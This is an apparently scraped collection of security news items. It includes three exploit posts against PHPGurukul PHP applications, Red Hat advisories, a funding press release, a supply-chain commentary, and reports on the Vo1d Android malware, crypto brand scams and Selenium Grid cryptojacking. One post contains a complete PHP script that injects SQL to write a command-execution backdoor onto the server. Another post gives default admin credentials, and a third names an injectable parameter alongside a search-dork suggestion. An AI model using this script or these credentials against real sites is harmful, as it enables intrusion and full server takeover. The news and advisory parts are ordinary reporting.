Medical Card Generations System version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Medical Card Generations System 1.0 Sql injection Vulnerability                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/medical-card-generation-system-using-php-and-mysql/                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : view-card-detail.php?viewid=1 <==== inject here [+] http://127.0.0.1/mcgs/view-card-detail.php?viewid=1Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Medical Card Generations System 1.0 SQL Injection

Maid Hiring Management System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Maid Hiring Management System 1.0 Insecure Settings Vulnerability                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/maid-hiring-management-system-using-php-and-mysql/                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin      Password: Test@123[+] http://127.0.0.1/mhms/admin/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Maid Hiring Management System 1.0 Insecure Settings

Red Hat Security Advisory 2024-6595-03 - An update for java-1.8.0-ibm is now available for Red Hat Enterprise Linux 8. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6595.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: java-1.8.0-ibm security updateAdvisory ID:        RHSA-2024:6595-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6595Issue date:         2024-09-11Revision:           03CVE Names:          ====================================================================Summary: An update for java-1.8.0-ibm is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:IBM Java SE version 8 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit.This update upgrades IBM Java SE 8 to version 8 SR8-FP15.Security Fix(es):* IBM JDK: Object Request Broker (ORB) denial of service (CVE-2023-38264)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:CVEs:References:https://access.redhat.com/security/updates/classification/#moderate

Red Hat Security Advisory 2024-6595-03

Red Hat Security Advisory 2024-6584-03 - An update for httpd is now available for Red Hat Enterprise Linux 7.7 Advanced Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6584.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: httpd security updateAdvisory ID:        RHSA-2024:6584-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6584Issue date:         2024-09-11Revision:           03CVE Names:          CVE-2024-38476====================================================================Summary: An update for httpd is now available for Red Hat Enterprise Linux 7.7 Advanced Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.Security Fix(es):* httpd: Security issues via?backend applications whose response headers are malicious or exploitable (CVE-2024-38476)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-38476References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2295015

Red Hat Security Advisory 2024-6584-03

Emergency Ambulance Hiring Portal version 1.0 suffers from a php code injection vulnerability.

    =============================================================================================================================================| # Title     : Emergency Ambulance Hiring Portal 1.0 php code injection Vulnerability                                                      || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/emergency-ambulance-hiring-portal-using-php-and-mysql/                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload inject php code contains a back door.[+] Line 16 + 19 Set your Target.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php[+] payload :<?php// المكتبات المطلوبةfunction send_request($url, $data) {    $options = [        'http' => [            'header'  => "Content-Type: application/x-www-form-urlencoded\r\n",            'method'  => 'POST',            'content' => http_build_query($data),        ]    ];    $context  = stream_context_create($options);    return file_get_contents($url, false, $context);}// تحديد URL ثابت$url = 'http://localhost/eahp/';// مسار ثابت لرفع الملف$path = 'C:\www\eahp\uploaded.php';$path = str_replace("\\", "\\\\", $path);// حمولة الباب الخلفي$backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';// إرسال ملف PHP يحتوي على الباب الخلفي$payload = [    'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a",    'password' => 'test',    'login' => ''];send_request($url . "/admin/login.php", $payload);echo "[+] PHP backdoor uploaded successfully at $path\n";// تنفيذ ملف PHP المرفوع واختبار الباب الخلفي$response = file_get_contents($url . "uploaded.php?cmd=whoami");echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n";?>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Emergency Ambulance Hiring Portal 1.0 PHP Code Injection

Silver Spring, United States, 12th September 2024, CyberNewsWire

**Silver Spring, United States, September 12th, 2024, CyberNewsWire**

The investment will drive the company’s advancement of scalable workload access management for enterprises

Aembit, the leading non-human identity and access management (IAM) company, has secured $25 million in Series A funding, bringing its total capital raised to nearly $45 million. Acrew Capital led the round, with participation from existing investors Ballistic Ventures, Ten Eleven Ventures, Okta Ventures, and CrowdStrike Falcon Fund.

Aembit’s funding comes in the wake of continued high-profile non-human identity attacks on organizations such as Cloudflare, The New York Times, and Microsoft. Non-human identity (NHI) refers to the applications, scripts, and bots that businesses use to automate their operations, as well as the credentials used by NHIs to communicate to sensitive databases, applications, and infrastructure. 

These incidents exposed secrets such as API keys, access tokens, and other non-human access credentials, which were used to penetrate enterprise environments. In a newly published survey of security professionals, Aembit found that most organizations still struggle with managing NHI credentials securely: Over 30% still storing credentials in code, and 23% using email and chat to share credentials. Over 60% of respondents are looking for a comprehensive solution across their entire organization.

Security professionals are recognizing the need for an access-focused approach that automates identity-driven, secretless, centrally enforced, and auditable access between distributed applications and SaaS services to sensitive resources in the cloud and on-premises. 

Aembit has led the market in solving this emerging challenge by pioneering non-human IAM. It enables policy-based access management between workloads and the sensitive resources they access, moving beyond reactive visibility and governance to proactively shrink the attack surface of rapidly growing and highly distributed non-human identities. Aembit was recently lauded as a Top 2 finalist in the prestigious 2024 RSA Innovation Sandbox competition and is a finalist for Best Identity Management Solution at the 2024 SC Awards. Aembit continues to advance access management with capabilities such as MFA-strength conditional access, policy automation via infrastructure-as-code, and robust auditing for NHI access. 

> “Aembit is tackling one of the most pressing challenges in modern enterprise security,” said Mark Kraynak, founding partner at Acrew Capital. “The shift to cloud and SaaS, and AI has driven an order-of-magnitude expansion in non-human identities. With the proliferation of microservices and APIs across diverse environments, IAM has become the critical first line of defense for protecting sensitive data. Legacy access management approaches weren’t designed with this level of scale and automation in mind. We are thrilled to be partnering with Aembit to bring a new approach to the market.”

Co-Founders David Goldschlag and Kevin Sapp have spent their careers innovating across the identity landscape, most recently creating New Edge Labs (acquired by Netskope), one of the first user zero trust products on the market.

> “Kevin and I founded Aembit with a vision to help enterprises secure access between non-human workloads, applications, and software resources with the same principles used today to secure human access,” said David Goldschlag, co-founder and CEO of Aembit. “Talking to hundreds of enterprises, and working closely with design partners, our approach centers on proactively securing access between non-human identities, while eliminating friction for developers and security teams.”

> “By solving non-human IAM, Aembit is tackling an essential security challenge,” said Brad Jones, CISO at Snowflake and an Aembit customer. “Not only is their approach to non-human access innovative, but Aembit is a provider we can rely on.”

The Aembit Workload IAM Platform enforces secure access between non-human workloads and the services that authorize access to sensitive data and infrastructure. Aembit’s policy engine grants secretless access, just-in-time, based on the workload’s identity and posture. 

Leveraging native identities and sophisticated automation, organizations use Aembit to eliminate storage of sensitive secrets within applications or vaults by moving to short-lived access tokens with a no-code auth approach. With Aembit, businesses proactively secure non-human access while eliminating the manual and fragmented work required today by security, engineering, and DevSecOps teams.

**About Aembit**

Aembit is the non-human identity and access management platform that secures access between workloads across clouds, SaaS, and data centers. With Aembit’s identity control plane, DevSecOps can fully automate secretless, policy-based, and Zero Trust workload access with MFA-strength capabilities. For more information, users can visit https://aembit.io/ and follow us on LinkedIn.

**Contact**

**CMO**  
**Apurva Davé**  
**Aembit**  
**\[email protected\]**

Aembit Raises $25 Million in Series A Funding for Non-Human Identity and Access Management

Understanding a threat is just as important as the steps taken toward prevention.

Ansh Patnaik, Senior Vice President of Product Management, CyCognito

September 12, 2024

5 Min Read

Source: Zonnar GmbH via Alamy Stock Photo

COMMENTARY

In recent years, software supply chain attacks have moved from the periphery of concerns to the forefront. According to Verizon's "2024 Data Breach Investigations Report," the use of vulnerabilities to initiate breaches surged by 180% in 2023, compared to 2022. Of those breaches, 15% involved a third party or supplier, such as software supply chains, hosting partner infrastructures, or data custodians. 

These statistics come as no surprise, given the impact of several high-profile vulnerabilities in 2023. 

SolarWinds is probably the biggest known example of a software supply chain attack to date. More than 18,000 organizations were affected, with some reports stating the attack cost those affected 11% of their revenue, on average.

Similarly, Okta also experienced a significant breach where threat actors accessed private customer data through its support management system. The breach went undetected for weeks, despite security alerts.

And let's not forget the drawn-out MOVEit Transfer tool attack, which affected more than 620 organizations, including major entities like the BBC and British Airways. Linked to the Cl0p ransomware group, the attack clearly emphasized the urgency of promptly patching vulnerabilities and securing Web-facing applications. 

A very important detail to note is that the ramifications of software supply chain attacks could be enduring, both from a technical threat and liability perspective. In October 2023, nearly three years after the notorious SolarWinds breach, the Securities and Exchange Commission (SEC) charged SolarWinds with misleading investors about its cybersecurity practices and risks. This charge followed a $26 million settlement of a securities class-action lawsuit related to the breach.

But to understand how these attacks occur and how they can be mitigated, it's important to first understand what software supply chain security is.

**Unpacking Software Supply Chain Security**

Gartner defines software supply chain security (SSCS) as a comprehensive framework encompassing the processes and tools necessary to curate, create, and consume software securely, thereby mitigating potential attacks on software or its use as an attack vector. This framework is structured around three core pillars:

1.  Curation: This step is all about evaluating third-party software components to assess their risks and determine if they're suitable for use. By doing this, organizations ensure that only secure and compliant components make their way into the software supply chain.
    
2.  Creation: This shows the importance of secure development practices and protecting both software artifacts and the development pipeline. It involves putting security measures in place throughout the software creation process to guard against vulnerabilities and potential threats.
    
3.  Consumption: This stage focuses on ensuring the integrity of the software by verifying its source, authenticity, and traceability. It ensures that the software being deployed is secure and has not been tampered with or modified without authorization.
    

In simpler terms, SSCS encompasses all the software components used and built into an organization's software, as well as the practices developers employ to write and monitor code post-deployment.

Gartner's efforts in this area are a direct result of what it deems to be an escalating threat. In fact, it projects that the financial impact of supply chain attacks will escalate from $40 billion in 2023 to $138 billion by 2031.

The US government is also taking measures, mandating that its suppliers provide a software bill of materials (SBOM), underscoring the need for transparency and accountability in the software supply chain.

**Building a Software Supply Chain Security Program**

Managing the risk of vulnerabilities during software development relies on two main processes: continuous code scanning throughout the software development life cycle (SDLC) and maintaining a highly automated SDLC to efficiently update, test, and deploy new software versions.

*   Continuous code scanning: It's crucial to implement continuous code scanning throughout the SDLC to catch vulnerabilities early. This involves using both static and dynamic application security testing (SAST and DAST) to ensure that both proprietary and third-party code are secure.
    
*   Automated SDLC: Keeping the SDLC highly automated is key to efficiently updating, testing, and deploying new software versions. Automation helps reduce human error and speeds up the process of identifying and fixing vulnerabilities.
    

Scanning third-party code with source code analysis (SCA) tools is essential in this context. SCA automates the detection and management of risks associated with third-party and open source software components. Here's what SCA can do:

*   Identify software components: SCA tools can pinpoint all the components within a software application, giving you a clear view of the software supply chain.
    
*   Generate software bills of materials (SBOM): SBOMs provide a list of all components and their metadata, helping organizations comply with regulatory requirements and manage open source licenses.
    
*   Scan for vulnerabilities: These tools scan for known vulnerabilities in software components, offering alerts and guidance for remediation.
    
*   Assess risks: They evaluate the risk level of each component, allowing organizations to prioritize remediation efforts based on the severity of the risk.
    
*   Generate dependency graphs: These graphs show the relationships between components, helping to identify potential points of failure or risk.
    
*   Provide remediation guidance: SCA tools offer actionable advice on how to fix identified vulnerabilities.
    
*   Automatically enforce policies: You can set policies to automatically block the use of components with known vulnerabilities or license issues.
    

External exposure management is also playing an increasingly critical role in supply chain security, with organizations adding more third-party services and building more Web apps using third-party components and libraries every day.

**The Future**

The financial impact of these attacks is projected to grow significantly, making it imperative for organizations to act now. 

The key moving forward is first awareness. Understanding the threat is as important as the steps toward prevention. Once this is established, there are ample resources and technologies to equip security teams with the reinforcements to protect their ecosystems.

**About the Author**

Senior Vice President of Product Management, CyCognito

Ansh Patnaik, senior vice president of product management of CyCognito, has more than 20 years of cross functional experience in cybersecurity and data analytics. Most recently, Ansh was director, cloud security products for Google Cloud Platform, and chief product officer for Chronicle, prior to the acquisition of Chronicle by Google. Previously, he was vice president of product management at Oracle Cloud, where he defined and launched its security analytics cloud service offering. Ansh has held product management, product marketing, and sales engineering leadership roles at several market leading software companies, including Delphix, ArcSight (acquired by HP), and BindView (acquired by Symantec).

Rising Tide of Software Supply Chain Attacks: An Urgent Problem

Nearly 1.3 million Android-based TV boxes running outdated versions of the operating system and belonging to users spanning 197 countries have been infected by a new malware dubbed Vo1d (aka Void).
"It is a backdoor that puts its components in the system storage area and, when commanded by attackers, is capable of secretly downloading and installing third-party software," Russian antivirus

Nearly 1.3 million Android-based TV boxes running outdated versions of the operating system and belonging to users spanning 197 countries have been infected by a new malware dubbed Vo1d (aka Void).

"It is a backdoor that puts its components in the system storage area and, when commanded by attackers, is capable of secretly downloading and installing third-party software," Russian antivirus vendor Doctor Web said in a report published today.

A majority of the infections have been detected in Brazil, Morocco, Pakistan, Saudi Arabia, Argentina, Russia, Tunisia, Ecuador, Malaysia, Algeria, and Indonesia.

It's currently not known what the source of the infection is, although it's suspected that it may have either involved an instance of prior compromise that allows for gaining root privileges or the use of unofficial firmware versions with built-in root access.

The following TV models have been targeted as part of the campaign -

*   KJ-SMART4KVIP (Android 10.1; KJ-SMART4KVIP Build/NHG47K)
*   R4 (Android 7.1.2; R4 Build/NHG47K)
*   TV BOX (Android 12.1; TV BOX Build/NHG47K)

The attack entails the substitution of the "/system/bin/debuggerd" daemon file (with the original file moved to a backup file named "debuggerd\_real"), as well as the introduction of two new files – "/system/xbin/vo1d" and "/system/xbin/wd" – which contain the malicious code and operate concurrently.

"Before Android 8.0, crashes were handled by the debuggerd and debuggerd64 daemons," Google notes in its Android documentation. "In Android 8.0 and higher, crash\_dump32 and crash\_dump64 are spawned as needed."

Two different files shipped as part of the Android operating system – install-recovery.sh and daemonsu – have been modified as part of the campaign to trigger the execution of the malware by starting the "wd" module.

"The trojan's authors probably tried to disguise one if its components as the system program '/system/bin/vold,' having called it by the similar-looking name 'vo1d' (substituting the lowercase letter 'l' with the number '1')," Doctor Web said.

The "vo1d" payload, in turn, starts "wd" and ensures it's persistently running, while also downloading and running executables when instructed by a command-and-control (C2) server. Furthermore, it keeps tabs on specified directories and installs the APK files that it finds in them.

"Unfortunately, it is not uncommon for budget device manufacturers to utilize older OS versions and pass them off as more up-to-date ones to make them more attractive," the company said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Beware: New Vo1d Malware Infects 1.3 Million Android TV Boxes Worldwide

Cybercriminals are increasingly targeting retail affiliate programs with sophisticated cryptocurrency scams. Retailers and customers must stay alert against…

Cybercriminals are increasingly targeting retail affiliate programs with sophisticated cryptocurrency scams. Retailers and customers must stay alert against domain fraud, brand impersonation, and online Ponzi schemes to prevent losses.

Cybercriminals and nation-state hackers are increasingly targeting retail affiliate programs to conduct cryptocurrency scams, according to the latest research by cybersecurity firm DomainTools.

With its vast economic footprint and consumer brand loyalty, the retail sector has become a prime target for these malicious actors, exploiting online platforms and brand reputations to deceive consumers and reap financial rewards.

**Leveraging Brand Loyalty for Fraud**

The global retail industry—valued at over $30 trillion annually and with the top 50 retailers contributing more than $1.13 trillion in revenue in 2023—has always been a lucrative target for scammers and fraudsters. However, the transition toward e-commerce has opened up new opportunities for cybercriminals to exploit.

The DomainTools detailed technical report, shared with Hackread.com ahead of publishing, dives deep into how threat actors use domain fraud, brand impersonation, and multi-level Ponzi schemes to deceive consumers and steal cryptocurrency.

Cybercriminals are not just after financial gains; they are also damaging brand reputations. By closely imitating well-known consumer brands, these actors aim to exploit the trust and loyalty consumers have for these companies. This multi-layered fraud not only affects individual consumers but also threatens the credibility of the brands themselves.

**Online Storefronts: A Hotspot for Fraud**

One noteworthy trend underlined in the report is the rise of **e-commerce domain fraud**. As physical stores closed during the global pandemic, the retail sector’s move to online platforms created another ground for cybercriminals.

One group of threat actors, for instance, set up hundreds of fraudulent websites to impersonate well-known global retailers. These sites often promised huge discounts through fake “store closing” sales, luring unsuspecting consumers into the trap.

DomainTools traced thousands of such fraudulent domains, some of which impersonated luxury brands like Rolex and Cartier. The scammers created these fake websites using templates, automated processes, and even legitimate e-commerce platforms to generate convincing landing pages. The scale of the operation is staggering, with over 2,300 fraudulent domains tied to just one SSL certificate alone.

**Ponzi Schemes Disguised as Affiliate Programs**

The report also uncovers a disturbing trend: the use of brand impersonation to conduct financial fraud. Cybercriminals are preying on individuals looking for side-income opportunities by promising commissions for completing simple tasks, such as boosting online sales for well-known brands like Amazon and Target. Victims are led to believe they are joining legitimate affiliate programs when, in reality, they are being lured into Ponzi schemes.

These scams often require victims to invest in cryptocurrency, such as USDT (Tether), with the promise of high returns. The fraudsters then push victims to recruit others, creating a multi-level marketing front.

In one case, a fraudulent website using the domain “amazon-9000com” mimicked Amazon’s platform to convince users to invest in these fake opportunities. This particular scheme was linked to over 200 other fraudulent domains impersonating major brands, including Lazada, Walmart, and TikTok.

Example of malicious domains impersonating top brands (Screenshot: DomainTools)

**Copycat Scams Spread Quickly**

The third major finding in the report is the proliferation of **copycat schemes**. Once a scam proves successful, it is quickly replicated by other cyber criminals. For example, a domain called “targetpk8top” appeared in late 2023, impersonating Target in much the same way as earlier scams targeted Amazon. The same templates, naming conventions, and SSL certificates were used, showing how quickly these tactics spread across the cybercriminal ecosystem.

These copycat scams often follow a familiar playbook: they use fake investment schemes, promise high cryptocurrency returns, and rely on social media platforms to find new victims. By the time consumers realize they’ve been duped, the scammers have often disappeared, leaving little chance of recovering lost funds.

**What’s Next for Retailers?**

The report urges the retail sector to remain vigilant. These scams have been ongoing since at least 2020, and the perpetrators show no signs of slowing down. Retailers must monitor their online presence closely, especially regarding domain registrations and brand impersonations.

Additionally, collaboration is key. Organizations like the **Retail and Hospitality Information Sharing and Analysis Center (RH-ISAC)** and the **National Cyber-Forensics and Training Alliance (NCFTA)** are instrumental in sharing threat intelligence across the industry, helping retailers stay one step ahead of evolving cyber threats.

Although such scams are not new, their increased sophistication is only making it worse for unsuspecting customers and retailers. Therefore, both parties should recognize the threat posed by domain fraud and brand impersonation. Businesses should train their employees, and customers should learn how to identify scams or malicious websites.

1.  How to Increase Your Business’s Online Brand Awareness
2.  Memcyco Introduces Real-Time Solution to Combat Brandjacking
3.  Check Point Research: Microsoft the Most Phished Brand in Q2 2023
4.  Domain Squatting, rand Hijacking: A Silent Threat to Digital Enterprises
5.  42,000 phishing domains discovered masquerading as popular brands

From Amazon to Target: Hackers Mimic Top Brands in Global Crypto Scam

Internet-exposed Selenium Grid instances are being targeted by bad actors for illicit cryptocurrency mining and proxyjacking campaigns.
"Selenium Grid is a server that facilitates running test cases in parallel across different browsers and versions," Cado Security researchers Tara Gould and Nate Bill said in an analysis published today.
"However, Selenium Grid's default configuration lacks

Cryptocurrency / Network Security

Internet-exposed Selenium Grid instances are being targeted by bad actors for illicit cryptocurrency mining and proxyjacking campaigns.

"Selenium Grid is a server that facilitates running test cases in parallel across different browsers and versions," Cado Security researchers Tara Gould and Nate Bill said in an analysis published today.

"However, Selenium Grid's default configuration lacks authentication, making it vulnerable to exploitation by threat actors."

The abuse of publicly-accessible Selenium Grid instances for deploying crypto miners was previously highlighted by cloud security firm Wiz in late July 2024 as part of an activity cluster dubbed SeleniumGreed.

Cado, which observed two different campaigns against its honeypot server, said the threat actors are exploiting the lack of authentication protections to carry out malicious actions.

The first of them leverage the "goog:chromeOptions" dictionary to inject a Base64-encoded Python script that, in turn, retrieves a script named "y," which is the open-source GSocket reverse shell.

The reverse shell subsequently serves as a medium for introducing the next-stage payload, a bash script named "pl" that retrieves IPRoyal Pawn and EarnFM from a remote server via curl and wget commands.

"IPRoyal Pawns is a residential proxy service that allows users to sell their internet bandwidth in exchange for money," Cado said.

"The user's internet connection is shared with the IPRoyal network with the service using the bandwidth as a residential proxy, making it available for various purposes, including for malicious purposes."

EarnFM is also a proxyware solution that's advertised as a "ground-breaking" way to "generate passive income online by simply sharing your internet connection."

The second attack, like the proxyjacking campaign, follows the same route to deliver a bash script via a Python script that checks if it's running on a 64-bit machine and then proceeds to drop a Golang-based ELF binary.

The ELF file subsequently attempts to escalate to root by leveraging the PwnKit flaw (CVE-2021-4043) and drops an XMRig cryptocurrency miner called perfcc.

"As many organizations rely on Selenium Grid for web browser testing, this campaign further highlights how misconfigured instances can be abused by threat actors," the researchers said. "Users should ensure authentication is configured, as it is not enabled by default."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Latest News